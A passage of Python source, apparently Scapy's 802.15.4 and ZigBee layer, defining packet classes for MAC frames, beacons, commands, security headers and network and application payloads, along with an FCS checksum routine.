\"None\", 1: \"Reserved\", 2: \"Short\", 3: \"Long\"}), # fcf p2 b1\n BitField(\"fcf_framever\", 0, 2), # 00 compatibility with 2003 version; 01 compatible with 2006 version\n BitEnumField(\"fcf_destaddrmode\", 2, 2, {0: \"None\", 1: \"Reserved\", 2: \"Short\", 3: \"Long\"}), # fcf p2 b2\n BitField(\"fcf_reserved_2\", 0, 2),\n Emph(ByteField(\"seqnum\", 1)) # sequence number\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 %Dot15d4.fcf_frametype% ackreq(%Dot15d4.fcf_ackreq%) ( %Dot15d4.fcf_destaddrmode% -> %Dot15d4.fcf_srcaddrmode% ) Seq#%Dot15d4.seqnum%\")\n\n def guess_payload_class(self, payload):\n if self.fcf_frametype == 0x00:\n return Dot15d4Beacon\n elif self.fcf_frametype == 0x01:\n return Dot15d4Data\n elif self.fcf_frametype == 0x02:\n return Dot15d4Ack\n elif self.fcf_frametype == 0x03:\n return Dot15d4Cmd\n else:\n return Packet.guess_payload_class(self, payload)\n\n def answers(self, other):\n if isinstance(other, Dot15d4):\n if self.fcf_frametype == 2: # ack\n if self.seqnum != other.seqnum: # check for seqnum matching\n return 0\n elif other.fcf_ackreq == 1: # check that an ack was indeed requested\n return 1\n return 0\n\n def post_build(self, p, pay):\n # This just forces destaddrmode to None for Ack frames.\n # TODO find a more elegant way to do this\n if self.fcf_frametype == 2 and self.fcf_destaddrmode != 0:\n self.fcf_destaddrmode = 0\n return raw(self)\n else:\n return p + pay\n\n\nclass Dot15d4FCS(Dot15d4, Packet):\n '''\n This class is a drop-in replacement for the Dot15d4 class above, except\n it expects a FCS/checksum in the input, and produces one in the output.\n This provides the user flexibility, as many 802.15.4 interfaces will have an AUTO_CRC setting\n that will validate the FCS/CRC in firmware, and add it automatically when transmitting.\n '''\n\n def pre_dissect(self, s):\n \"\"\"Called right before the current layer is dissected\"\"\"\n if (makeFCS(s[:-2]) != s[-2:]): # validate the FCS given\n warning(\"FCS on this packet is invalid or is not present in provided bytes.\")\n return s # if not valid, pretend there was no FCS present\n return s[:-2] # otherwise just disect the non-FCS section of the pkt\n\n def post_build(self, p, pay):\n # This just forces destaddrmode to None for Ack frames.\n # TODO find a more elegant way to do this\n if self.fcf_frametype == 2 and self.fcf_destaddrmode != 0:\n self.fcf_destaddrmode = 0\n return raw(self)\n else:\n return p + pay + makeFCS(p + pay) # construct the packet with the FCS at the end\n\n\nclass Dot15d4Ack(Packet):\n name = \"802.15.4 Ack\"\n fields_desc = []\n\n\nclass Dot15d4AuxSecurityHeader(Packet):\n name = \"802.15.4 Auxiliary Security Header\"\n fields_desc = [\n BitField(\"sec_sc_reserved\", 0, 3),\n # Key Identifier Mode\n # 0: Key is determined implicitly from the originator and receipient(s) of the frame\n # 1: Key is determined explicitly from the the 1-octet Key Index subfield of the Key Identifier field\n # 2: Key is determined explicitly from the 4-octet Key Source and the 1-octet Key Index\n # 3: Key is determined explicitly from the 8-octet Key Source and the 1-octet Key Index\n BitEnumField(\"sec_sc_keyidmode\", 0, 2, {\n 0: \"Implicit\", 1: \"1oKeyIndex\", 2: \"4o-KeySource-1oKeyIndex\", 3: \"8o-KeySource-1oKeyIndex\"}\n ),\n BitEnumField(\"sec_sc_seclevel\", 0, 3, {0: \"None\", 1: \"MIC-32\", 2: \"MIC-64\", 3: \"MIC-128\", \\\n 4: \"ENC\", 5: \"ENC-MIC-32\", 6: \"ENC-MIC-64\", 7: \"ENC-MIC-128\"}),\n XLEIntField(\"sec_framecounter\", 0x00000000), # 4 octets\n # Key Identifier (variable length): identifies the key that is used for cryptographic protection\n # Key Source : length of sec_keyid_keysource varies btwn 0, 4, and 8 bytes depending on sec_sc_keyidmode\n # 4 octets when sec_sc_keyidmode == 2\n ConditionalField(XLEIntField(\"sec_keyid_keysource\", 0x00000000),\n lambda pkt: pkt.getfieldval(\"sec_sc_keyidmode\") == 2),\n # 8 octets when sec_sc_keyidmode == 3\n ConditionalField(LELongField(\"sec_keyid_keysource\", 0x0000000000000000),\n lambda pkt: pkt.getfieldval(\"sec_sc_keyidmode\") == 3),\n # Key Index (1 octet): allows unique identification of different keys with the same originator\n ConditionalField(XByteField(\"sec_keyid_keyindex\", 0xFF),\n lambda pkt: pkt.getfieldval(\"sec_sc_keyidmode\") != 0),\n ]\n\n\nclass Dot15d4Data(Packet):\n name = \"802.15.4 Data\"\n fields_desc = [\n XLEShortField(\"dest_panid\", 0xFFFF),\n dot15d4AddressField(\"dest_addr\", 0xFFFF, length_of=\"fcf_destaddrmode\"),\n ConditionalField(XLEShortField(\"src_panid\", 0x0),\n lambda pkt:util_srcpanid_present(pkt)),\n ConditionalField(dot15d4AddressField(\"src_addr\", None, length_of=\"fcf_srcaddrmode\"),\n lambda pkt:pkt.underlayer.getfieldval(\"fcf_srcaddrmode\") != 0),\n # Security field present if fcf_security == True\n ConditionalField(PacketField(\"aux_sec_header\", Dot15d4AuxSecurityHeader(), Dot15d4AuxSecurityHeader),\n lambda pkt:pkt.underlayer.getfieldval(\"fcf_security\") is True),\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Data ( %Dot15d4Data.src_panid%:%Dot15d4Data.src_addr% -> %Dot15d4Data.dest_panid%:%Dot15d4Data.dest_addr% )\")\n\n\nclass Dot15d4Beacon(Packet):\n name = \"802.15.4 Beacon\"\n fields_desc = [\n XLEShortField(\"src_panid\", 0x0),\n dot15d4AddressField(\"src_addr\", None, length_of=\"fcf_srcaddrmode\"),\n # Security field present if fcf_security == True\n ConditionalField(PacketField(\"aux_sec_header\", Dot15d4AuxSecurityHeader(), Dot15d4AuxSecurityHeader),\n lambda pkt:pkt.underlayer.getfieldval(\"fcf_security\") is True),\n\n # Superframe spec field:\n BitField(\"sf_sforder\", 15, 4), # not used by ZigBee\n BitField(\"sf_beaconorder\", 15, 4), # not used by ZigBee\n BitEnumField(\"sf_assocpermit\", 0, 1, [False, True]),\n BitEnumField(\"sf_pancoord\", 0, 1, [False, True]),\n BitField(\"sf_reserved\", 0, 1), # not used by ZigBee\n BitEnumField(\"sf_battlifeextend\", 0, 1, [False, True]), # not used by ZigBee\n BitField(\"sf_finalcapslot\", 15, 4), # not used by ZigBee\n\n # GTS Fields\n # GTS Specification (1 byte)\n BitEnumField(\"gts_spec_permit\", 1, 1, [False, True]), # GTS spec bit 7, true=1 iff PAN cord is accepting GTS requests\n BitField(\"gts_spec_reserved\", 0, 4), # GTS spec bits 3-6\n BitField(\"gts_spec_desccount\", 0, 3), # GTS spec bits 0-2\n # GTS Directions (0 or 1 byte)\n ConditionalField(BitField(\"gts_dir_reserved\", 0, 1), lambda pkt:pkt.getfieldval(\"gts_spec_desccount\") != 0),\n ConditionalField(BitField(\"gts_dir_mask\", 0, 7), lambda pkt:pkt.getfieldval(\"gts_spec_desccount\") != 0),\n # GTS List (variable size)\n # TODO add a Packet/FieldListField tied to 3bytes per count in gts_spec_desccount\n\n # Pending Address Fields:\n # Pending Address Specification (1 byte)\n BitField(\"pa_num_short\", 0, 3), # number of short addresses pending\n BitField(\"pa_reserved_1\", 0, 1),\n BitField(\"pa_num_long\", 0, 3), # number of long addresses pending\n BitField(\"pa_reserved_2\", 0, 1),\n # Address List (var length)\n # TODO add a FieldListField of the pending short addresses, followed by the pending long addresses, with max 7 addresses\n # TODO beacon payload\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Beacon ( %Dot15d4Beacon.src_panid%:%Dot15d4Beacon.src_addr% ) assocPermit(%Dot15d4Beacon.sf_assocpermit%) panCoord(%Dot15d4Beacon.sf_pancoord%)\")\n\n\nclass Dot15d4Cmd(Packet):\n name = \"802.15.4 Command\"\n fields_desc = [\n XLEShortField(\"dest_panid\", 0xFFFF),\n # Users should correctly set the dest_addr field. By default is 0x0 for construction to work.\n dot15d4AddressField(\"dest_addr\", 0x0, length_of=\"fcf_destaddrmode\"),\n ConditionalField(XLEShortField(\"src_panid\", 0x0), \\\n lambda pkt:util_srcpanid_present(pkt)),\n ConditionalField(dot15d4AddressField(\"src_addr\", None, length_of=\"fcf_srcaddrmode\"), \\\n lambda pkt:pkt.underlayer.getfieldval(\"fcf_srcaddrmode\") != 0),\n # Security field present if fcf_security == True\n ConditionalField(PacketField(\"aux_sec_header\", Dot15d4AuxSecurityHeader(), Dot15d4AuxSecurityHeader),\n lambda pkt:pkt.underlayer.getfieldval(\"fcf_security\") is True),\n ByteEnumField(\"cmd_id\", 0, {\n 1: \"AssocReq\", # Association request\n 2: \"AssocResp\", # Association response\n 3: \"DisassocNotify\", # Disassociation notification\n 4: \"DataReq\", # Data request\n 5: \"PANIDConflictNotify\", # PAN ID conflict notification\n 6: \"OrphanNotify\", # Orphan notification\n 7: \"BeaconReq\", # Beacon request\n 8: \"CoordRealign\", # coordinator realignment\n 9: \"GTSReq\" # GTS request\n # 0x0a - 0xff reserved\n }),\n # TODO command payload\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Command %Dot15d4Cmd.cmd_id% ( %Dot15dCmd.src_panid%:%Dot15d4Cmd.src_addr% -> %Dot15d4Cmd.dest_panid%:%Dot15d4Cmd.dest_addr% )\")\n\n # command frame payloads are complete: DataReq, PANIDConflictNotify, OrphanNotify, BeaconReq don't have any payload\n # Although BeaconReq can have an optional ZigBee Beacon payload (implemented in ZigBeeBeacon)\n def guess_payload_class(self, payload):\n if self.cmd_id == 1:\n return Dot15d4CmdAssocReq\n elif self.cmd_id == 2:\n return Dot15d4CmdAssocResp\n elif self.cmd_id == 3:\n return Dot15d4CmdDisassociation\n elif self.cmd_id == 8:\n return Dot15d4CmdCoordRealign\n elif self.cmd_id == 9:\n return Dot15d4CmdGTSReq\n else:\n return Packet.guess_payload_class(self, payload)\n\n\nclass Dot15d4CmdCoordRealign(Packet):\n name = \"802.15.4 Coordinator Realign Command\"\n fields_desc = [\n # PAN Identifier (2 octets)\n XLEShortField(\"panid\", 0xFFFF),\n # Coordinator Short Address (2 octets)\n XLEShortField(\"coord_address\", 0x0000),\n # Logical Channel (1 octet): the logical channel that the coordinator intends to use for all future communications\n ByteField(\"channel\", 0),\n # Short Address (2 octets)\n XLEShortField(\"dev_address\", 0xFFFF),\n # Channel page (0/1 octet) TODO optional\n # ByteField(\"channel_page\", 0),\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Coordinator Realign Payload ( PAN ID: %Dot15dCmdCoordRealign.pan_id% : channel %Dot15d4CmdCoordRealign.channel% )\")\n\n\n# ZigBee #\n\nclass ZigbeeNWK(Packet):\n name = \"Zigbee Network Layer\"\n fields_desc = [\n BitField(\"discover_route\", 0, 2),\n BitField(\"proto_version\", 2, 4),\n BitEnumField(\"frametype\", 0, 2, {0: 'data', 1: 'command'}),\n FlagsField(\"flags\", 0, 8, ['multicast', 'security', 'source_route', 'extended_dst', 'extended_src', 'reserved1', 'reserved2', 'reserved3']),\n XLEShortField(\"destination\", 0),\n XLEShortField(\"source\", 0),\n ByteField(\"radius\", 0),\n ByteField(\"seqnum\", 1),\n\n ConditionalField(ByteField(\"relay_count\", 1), lambda pkt:pkt.flags & 0x04),\n ConditionalField(ByteField(\"relay_index\", 0), lambda pkt:pkt.flags & 0x04),\n ConditionalField(FieldListField(\"relays\", [], XLEShortField(\"\", 0x0000), count_from=lambda pkt:pkt.relay_count), lambda pkt:pkt.flags & 0x04),\n\n # ConditionalField(XLongField(\"ext_dst\", 0), lambda pkt:pkt.flags & 8),\n ConditionalField(dot15d4AddressField(\"ext_dst\", 0, adjust=lambda pkt, x: 8), lambda pkt:pkt.flags & 8),\n # ConditionalField(XLongField(\"ext_src\", 0), lambda pkt:pkt.flags & 16),\n ConditionalField(dot15d4AddressField(\"ext_src\", 0, adjust=lambda pkt, x: 8), lambda pkt:pkt.flags & 16),\n ]\n\n def guess_payload_class(self, payload):\n if self.flags & 0x02:\n return ZigbeeSecurityHeader\n elif self.frametype == 0:\n return ZigbeeAppDataPayload\n elif self.frametype == 1:\n return ZigbeeNWKCommandPayload\n else:\n return Packet.guess_payload_class(self, payload)\n\n\nclass LinkStatusEntry(Packet):\n name = \"ZigBee Link Status Entry\"\n fields_desc = [\n # Neighbor network address (2 octets)\n XLEShortField(\"neighbor_network_address\", 0x0000),\n # Link status (1 octet)\n BitField(\"reserved1\", 0, 1),\n BitField(\"outgoing_cost\", 0, 3),\n BitField(\"reserved2\", 0, 1),\n BitField(\"incoming_cost\", 0, 3),\n ]\n\n\nclass ZigbeeNWKCommandPayload(Packet):\n name = \"Zigbee Network Layer Command Payload\"\n fields_desc = [\n ByteEnumField(\"cmd_identifier\", 1, {\n 1: \"route request\",\n 2: \"route reply\",\n 3: \"network status\",\n 4: \"leave\",\n 5: \"route record\",\n 6: \"rejoin request\",\n 7: \"rejoin response\",\n 8: \"link status\",\n 9: \"network report\",\n 10: \"network update\"\n # 0x0b - 0xff reserved\n }),\n\n # - Route Request Command - #\n # Command options (1 octet)\n ConditionalField(BitField(\"reserved\", 0, 1), lambda pkt: pkt.cmd_identifier == 1),\n ConditionalField(BitField(\"multicast\", 0, 1), lambda pkt: pkt.cmd_identifier == 1),\n ConditionalField(BitField(\"dest_addr_bit\", 0, 1), lambda pkt: pkt.cmd_identifier == 1),\n ConditionalField(\n BitEnumField(\"many_to_one\", 0, 2, {\n 0: \"not_m2one\", 1: \"m2one_support_rrt\", 2: \"m2one_no_support_rrt\", 3: \"reserved\"}\n ), lambda pkt: pkt.cmd_identifier == 1),\n ConditionalField(BitField(\"reserved\", 0, 3), lambda pkt: pkt.cmd_identifier == 1),\n # Route request identifier (1 octet)\n ConditionalField(ByteField(\"route_request_identifier\", 0), lambda pkt: pkt.cmd_identifier == 1),\n # Destination address (2 octets)\n ConditionalField(XLEShortField(\"destination_address\", 0x0000), lambda pkt: pkt.cmd_identifier == 1),\n # Path cost (1 octet)\n ConditionalField(ByteField(\"path_cost\", 0), lambda pkt: pkt.cmd_identifier == 1),\n # Destination IEEE Address (0/8 octets), only present when dest_addr_bit has a value of 1\n ConditionalField(dot15d4AddressField(\"ext_dst\", 0, adjust=lambda pkt, x: 8),\n lambda pkt: (pkt.cmd_identifier == 1 and pkt.dest_addr_bit == 1)),\n\n # - Route Reply Command - #\n # Command options (1 octet)\n ConditionalField(BitField(\"reserved\", 0, 1), lambda pkt: pkt.cmd_identifier == 2),\n ConditionalField(BitField(\"multicast\", 0, 1), lambda pkt: pkt.cmd_identifier == 2),\n ConditionalField(BitField(\"responder_addr_bit\", 0, 1), lambda pkt: pkt.cmd_identifier == 2),\n ConditionalField(BitField(\"originator_addr_bit\", 0, 1), lambda pkt: pkt.cmd_identifier == 2),\n ConditionalField(BitField(\"reserved\", 0, 4), lambda pkt: pkt.cmd_identifier == 2),\n # Route request identifier (1 octet)\n ConditionalField(ByteField(\"route_request_identifier\", 0), lambda pkt: pkt.cmd_identifier == 2),\n # Originator address (2 octets)\n ConditionalField(XLEShortField(\"originator_address\", 0x0000), lambda pkt: pkt.cmd_identifier == 2),\n # Responder address (2 octets)\n ConditionalField(XLEShortField(\"responder_address\", 0x0000), lambda pkt: pkt.cmd_identifier == 2),\n # Path cost (1 octet)\n ConditionalField(ByteField(\"path_cost\", 0), lambda pkt: pkt.cmd_identifier == 2),\n # Originator IEEE address (0/8 octets)\n ConditionalField(dot15d4AddressField(\"originator_addr\", 0, adjust=lambda pkt, x: 8),\n lambda pkt: (pkt.cmd_identifier == 2 and pkt.originator_addr_bit == 1)),\n # Responder IEEE address (0/8 octets)\n ConditionalField(dot15d4AddressField(\"responder_addr\", 0, adjust=lambda pkt, x: 8),\n lambda pkt: (pkt.cmd_identifier == 2 and pkt.responder_addr_bit == 1)),\n\n # - Network Status Command - #\n # Status code (1 octet)\n ConditionalField(ByteEnumField(\"status_code\", 0, {\n 0x00: \"No route available\",\n 0x01: \"Tree link failure\",\n 0x02: \"Non-tree link failure\",\n 0x03: \"Low battery level\",\n 0x04: \"No routing capacity\",\n 0x05: \"No indirect capacity\",\n 0x06: \"Indirect transaction expiry\",\n 0x07: \"Target device unavailable\",\n 0x08: \"Target address unallocated\",\n 0x09: \"Parent link failure\",\n 0x0a: \"Validate route\",\n 0x0b: \"Source route failure\",\n 0x0c: \"Many-to-one route failure\",\n 0x0d: \"Address conflict\",\n 0x0e: \"Verify addresses\",\n 0x0f: \"PAN identifier update\",\n 0x10: \"Network address update\",\n 0x11: \"Bad frame counter\",\n 0x12: \"Bad key sequence number\",\n # 0x13 - 0xff Reserved\n }), lambda pkt: pkt.cmd_identifier == 3),\n # Destination address (2 octets)\n ConditionalField(XLEShortField(\"destination_address\", 0x0000), lambda pkt: pkt.cmd_identifier == 3),\n\n # - Leave Command - #\n # Command options (1 octet)\n # Bit 7: Remove children\n ConditionalField(BitField(\"remove_children\", 0, 1), lambda pkt: pkt.cmd_identifier == 4),\n # Bit 6: Request\n ConditionalField(BitField(\"request\", 0, 1), lambda pkt: pkt.cmd_identifier == 4),\n # Bit 5: Rejoin\n ConditionalField(BitField(\"rejoin\", 0, 1), lambda pkt: pkt.cmd_identifier == 4),\n # Bit 0 - 4: Reserved\n ConditionalField(BitField(\"reserved\", 0, 5), lambda pkt: pkt.cmd_identifier == 4),\n\n # - Route Record Command - #\n # Relay count (1 octet)\n ConditionalField(ByteField(\"rr_relay_count\", 0), lambda pkt: pkt.cmd_identifier == 5),\n # Relay list (variable in length)\n ConditionalField(\n FieldListField(\"rr_relay_list\", [], XLEShortField(\"\", 0x0000), count_from=lambda pkt:pkt.rr_relay_count),\n lambda pkt:pkt.cmd_identifier == 5),\n\n # - Rejoin Request Command - #\n # Capability Information (1 octet)\n ConditionalField(BitField(\"allocate_address\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # Allocate Address\n ConditionalField(BitField(\"security_capability\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # Security Capability\n ConditionalField(BitField(\"reserved2\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # bit 5 is reserved\n ConditionalField(BitField(\"reserved1\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # bit 4 is reserved\n ConditionalField(BitField(\"receiver_on_when_idle\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # Receiver On When Idle\n ConditionalField(BitField(\"power_source\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # Power Source\n ConditionalField(BitField(\"device_type\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # Device Type\n ConditionalField(BitField(\"alternate_pan_coordinator\", 0, 1), lambda pkt:pkt.cmd_identifier == 6), # Alternate PAN Coordinator\n\n # - Rejoin Response Command - #\n # Network address (2 octets)\n ConditionalField(XLEShortField(\"network_address\", 0xFFFF), lambda pkt:pkt.cmd_identifier == 7),\n # Rejoin status (1 octet)\n ConditionalField(ByteField(\"rejoin_status\", 0), lambda pkt:pkt.cmd_identifier == 7),\n\n # - Link Status Command - #\n # Command options (1 octet)\n ConditionalField(BitField(\"reserved\", 0, 1), lambda pkt:pkt.cmd_identifier == 8), # Reserved\n ConditionalField(BitField(\"last_frame\", 0, 1), lambda pkt:pkt.cmd_identifier == 8), # Last frame\n ConditionalField(BitField(\"first_frame\", 0, 1), lambda pkt:pkt.cmd_identifier == 8), # First frame\n ConditionalField(BitField(\"entry_count\", 0, 5), lambda pkt:pkt.cmd_identifier == 8), # Entry count\n # Link status list (variable size)\n ConditionalField(\n PacketListField(\"link_status_list\", [], LinkStatusEntry, count_from=lambda pkt:pkt.entry_count),\n lambda pkt:pkt.cmd_identifier == 8),\n\n # - Network Report Command - #\n # Command options (1 octet)\n ConditionalField(\n BitEnumField(\"report_command_identifier\", 0, 3, {0: \"PAN identifier conflict\"}), # 0x01 - 0x07 Reserved\n lambda pkt: pkt.cmd_identifier == 9),\n ConditionalField(BitField(\"report_information_count\", 0, 5), lambda pkt: pkt.cmd_identifier == 9),\n # EPID: Extended PAN ID (8 octets)\n ConditionalField(dot15d4AddressField(\"epid\", 0, adjust=lambda pkt, x: 8), lambda pkt: pkt.cmd_identifier == 9),\n # Report information (variable length)\n # Only present if we have a PAN Identifier Conflict Report\n ConditionalField(\n FieldListField(\"PAN_ID_conflict_report\", [], XLEShortField(\"\", 0x0000),\n count_from=lambda pkt:pkt.report_information_count),\n lambda pkt:(pkt.cmd_identifier == 9 and pkt.report_command_identifier == 0)\n ),\n\n # - Network Update Command - #\n # Command options (1 octet)\n ConditionalField(\n BitEnumField(\"update_command_identifier\", 0, 3, {0: \"PAN Identifier Update\"}), # 0x01 - 0x07 Reserved\n lambda pkt: pkt.cmd_identifier == 10),\n ConditionalField(BitField(\"update_information_count\", 0, 5), lambda pkt: pkt.cmd_identifier == 10),\n # EPID: Extended PAN ID (8 octets)\n ConditionalField(dot15d4AddressField(\"epid\", 0, adjust=lambda pkt, x: 8), lambda pkt: pkt.cmd_identifier == 10),\n # Update Id (1 octet)\n ConditionalField(ByteField(\"update_id\", 0), lambda pkt: pkt.cmd_identifier == 10),\n # Update Information (Variable)\n # Only present if we have a PAN Identifier Update\n # New PAN ID (2 octets)\n ConditionalField(XLEShortField(\"new_PAN_ID\", 0x0000),\n lambda pkt: (pkt.cmd_identifier == 10 and pkt.update_command_identifier == 0)),\n\n # StrLenField(\"data\", \"\", length_from=lambda pkt, s:len(s)),\n ]\n\n\ndef util_mic_len(pkt):\n ''' Calculate the length of the attribute value field '''\n if (pkt.nwk_seclevel == 0): # no encryption, no mic\n return 0\n elif (pkt.nwk_seclevel == 1): # MIC-32\n return 4\n elif (pkt.nwk_seclevel == 2): # MIC-64\n return 8\n elif (pkt.nwk_seclevel == 3): # MIC-128\n return 16\n elif (pkt.nwk_seclevel == 4): # ENC\n return 0\n elif (pkt.nwk_seclevel == 5): # ENC-MIC-32\n return 4\n elif (pkt.nwk_seclevel == 6): # ENC-MIC-64\n return 8\n elif (pkt.nwk_seclevel == 7): # ENC-MIC-128\n return 16\n else:\n return 0\n\n\nclass ZigbeeSecurityHeader(Packet):\n name = \"Zigbee Security Header\"\n fields_desc = [\n # Security control (1 octet)\n FlagsField(\"reserved1\", 0, 2, ['reserved1', 'reserved2']),\n BitField(\"extended_nonce\", 1, 1), # set to 1 if the sender address field is present (source)\n # Key identifier\n BitEnumField(\"key_type\", 1, 2, {\n 0: 'data_key',\n 1: 'network_key',\n 2: 'key_transport_key',\n 3: 'key_load_key'\n }),\n # Security level (3 bits)\n BitEnumField(\"nwk_seclevel\", 0, 3, {\n 0: \"None\",\n 1: \"MIC-32\",\n 2: \"MIC-64\",\n 3: \"MIC-128\",\n 4: \"ENC\",\n 5: \"ENC-MIC-32\",\n 6: \"ENC-MIC-64\",\n 7: \"ENC-MIC-128\"\n }),\n # Frame counter (4 octets)\n XLEIntField(\"fc\", 0), # provide frame freshness and prevent duplicate frames\n # Source address (0/8 octets)\n ConditionalField(dot15d4AddressField(\"source\", 0, adjust=lambda pkt, x: 8), lambda pkt: pkt.extended_nonce),\n # Key sequence number (0/1 octet): only present when key identifier is 1 (network key)\n ConditionalField(ByteField(\"key_seqnum\", 0), lambda pkt: pkt.getfieldval(\"key_type\") == 1),\n # Payload\n # the length of the encrypted data is the payload length minus the MIC\n StrLenField(\"data\", \"\", length_from=lambda pkt, s: len(s) - util_mic_len(pkt)),\n # Message Integrity Code (0/variable in size), length depends on nwk_seclevel\n StrLenField(\"mic\", \"\", length_from=lambda pkt: util_mic_len(pkt)),\n ]\n\n\nclass ZigbeeAppDataPayload(Packet):\n name = \"Zigbee Application Layer Data Payload (General APS Frame Format)\"\n fields_desc = [\n # Frame control (1 octet)\n FlagsField(\"frame_control\", 2, 4, ['reserved1', 'security', 'ack_req', 'extended_hdr']),\n BitEnumField(\"delivery_mode\", 0, 2, {0: 'unicast', 1: 'indirect', 2: 'broadcast', 3: 'group_addressing'}),\n BitEnumField(\"aps_frametype\", 0, 2, {0: 'data', 1: 'command', 2: 'ack'}),\n # Destination endpoint (0/1 octet)\n ConditionalField(ByteField(\"dst_endpoint\", 10), lambda pkt: (pkt.frame_control & 0x04 or pkt.aps_frametype == 2)),\n # Group address (0/2 octets) TODO\n # Cluster identifier (0/2 octets)\n ConditionalField(EnumField(\"cluster\", 0, _zcl_cluster_identifier, fmt=\"<H\"), # unsigned short (little-endian)\n lambda pkt: (pkt.frame_control & 0x04 or pkt.aps_frametype == 2)\n ),\n # Profile identifier (0/2 octets)\n ConditionalField(EnumField(\"profile\", 0, _zcl_profile_identifier, fmt=\"<H\"),\n lambda pkt: (pkt.frame_control & 0x04 or pkt.aps_frametype == 2)\n ),\n # Source endpoint (0/1 octets)\n ConditionalField(ByteField(\"src_endpoint\", 10), lambda pkt: (pkt.frame_control & 0x04 or pkt.aps_frametype == 2)),\n # APS counter (1 octet)\n ByteField(\"counter\", 0),\n # optional extended header\n # variable length frame payload: 3 frame types: data, APS command, and acknowledgement\n # ConditionalField(StrLenField(\"data\", \"\", length_from=lambda pkt, s:len(s)), lambda pkt:pkt.aps_frametype == 0),\n ]\n\n def guess_payload_class(self, payload):\n if self.frame_control & 0x02: # we have a security header\n return ZigbeeSecurityHeader\n elif self.aps_frametype == 0: # data\n return ZigbeeClusterLibrary # TODO might also be another frame\n elif self.aps_frametype == 1: # command\n return ZigbeeAppCommandPayload\n else:\n return Packet.guess_payload_class(self, payload)\n\n\nclass ZigbeeAppCommandPayload(Packet):\n name = \"Zigbee Application Layer Command Payload\"\n fields_desc = [\n ByteEnumField(\"cmd_identifier\", 1, {\n 1: \"APS_CMD_SKKE_1\",\n 2: \"APS_CMD_SKKE_2\",\n 3: \"APS_CMD_SKKE_3\",\n 4: \"APS_CMD_SKKE_4\",\n 5: \"APS_CMD_TRANSPORT_KEY\",\n 6: \"APS_CMD_UPDATE_DEVICE\",\n 7: \"APS_CMD_REMOVE_DEVICE\",\n 8: \"APS_CMD_REQUEST_KEY\",\n 9: \"APS_CMD_SWITCH_KEY\",\n 10: \"APS_CMD_EA_INIT_CHLNG\",\n 11: \"APS_CMD_EA_RSP_CHLNG\",\n 12: \"APS_CMD_EA_INIT_MAC_DATA\",\n 13: \"APS_CMD_EA_RSP_MAC_DATA\",\n 14: \"APS_CMD_TUNNEL\"\n }),\n StrLenField(\"data\", \"\", length_from=lambda pkt, s: len(s)),\n ]\n\n# Utility Functions #\n\n\ndef util_srcpanid_present(pkt):\n '''A source PAN ID is included if and only if both src addr mode != 0 and PAN ID Compression in FCF == 0'''\n if (pkt.underlayer.getfieldval(\"fcf_srcaddrmode\") != 0) and (pkt.underlayer.getfieldval(\"fcf_panidcompress\") == 0):\n return True\n else:\n return False\n\n# Do a CRC-CCITT Kermit 16bit on the data given\n# Returns a CRC that is the FCS for the frame\n# Implemented using pseudocode from: June 1986, Kermit Protocol Manual\n# See also: http://regregex.bbcmicro.net/crc-catalogue.htm#crc.cat.kermit\n\n\ndef makeFCS(data):\n crc = 0\n for i in range(0, len(data)):\n c = orb(data[i])\n q = (crc ^ c) & 15 # Do low-order 4 bits\n crc = (crc // 16) ^ (q * 4225)\n q = (crc ^ (c // 16)) & 15 # And high 4 bits\n crc = (crc // 16) ^ (q * 4225)\n return struct.pack('<H', crc) # return as bytes in little endian order\n\n\nclass Dot15d4CmdAssocReq(Packet):\n name = \"802.15.4 Association Request Payload\"\n fields_desc = [\n BitField(\"allocate_address\", 0, 1), # Allocate Address\n BitField(\"security_capability\", 0, 1), # Security Capability\n BitField(\"reserved2\", 0, 1), # bit 5 is reserved\n BitField(\"reserved1\", 0, 1), # bit 4 is reserved\n BitField(\"receiver_on_when_idle\", 0, 1), # Receiver On When Idle\n BitField(\"power_source\", 0, 1), # Power Source\n BitField(\"device_type\", 0, 1), # Device Type\n BitField(\"alternate_pan_coordinator\", 0, 1), # Alternate PAN Coordinator\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Association Request Payload ( Alt PAN Coord: %Dot15d4CmdAssocReq.alternate_pan_coordinator% Device Type: %Dot15d4CmdAssocReq.device_type% )\")\n\n\nclass Dot15d4CmdAssocResp(Packet):\n name = \"802.15.4 Association Response Payload\"\n fields_desc = [\n XLEShortField(\"short_address\", 0xFFFF), # Address assigned to device from coordinator (0xFFFF == none)\n # Association Status\n # 0x00 == successful\n # 0x01 == PAN at capacity\n # 0x02 == PAN access denied\n # 0x03 - 0x7f == Reserved\n # 0x80 - 0xff == Reserved for MAC primitive enumeration values\n ByteEnumField(\"association_status\", 0x00, {0: 'successful', 1: 'PAN_at_capacity', 2: 'PAN_access_denied'}),\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Association Response Payload ( Association Status: %Dot15d4CmdAssocResp.association_status% Assigned Address: %Dot15d4CmdAssocResp.short_address% )\")\n\n\nclass Dot15d4CmdDisassociation(Packet):\n name = \"802.15.4 Disassociation Notification Payload\"\n fields_desc = [\n # Disassociation Reason\n # 0x00 == Reserved\n # 0x01 == The coordinator wishes the device to leave the PAN\n # 0x02 == The device wishes to leave the PAN\n # 0x03 - 0x7f == Reserved\n # 0x80 - 0xff == Reserved for MAC primitive enumeration values\n ByteEnumField(\"disassociation_reason\", 0x02, {1: 'coord_wishes_device_to_leave', 2: 'device_wishes_to_leave'}),\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Disassociation Notification Payload ( Disassociation Reason %Dot15d4CmdDisassociation.disassociation_reason% )\")\n\n\nclass Dot15d4CmdGTSReq(Packet):\n name = \"802.15.4 GTS request command\"\n fields_desc = [\n # GTS Characteristics field (1 octet)\n # Reserved (bits 6-7)\n BitField(\"reserved\", 0, 2),\n # Characteristics Type (bit 5)\n BitField(\"charact_type\", 0, 1),\n # GTS Direction (bit 4)\n BitField(\"gts_dir\", 0, 1),\n # GTS Length (bits 0-3)\n BitField(\"gts_len\", 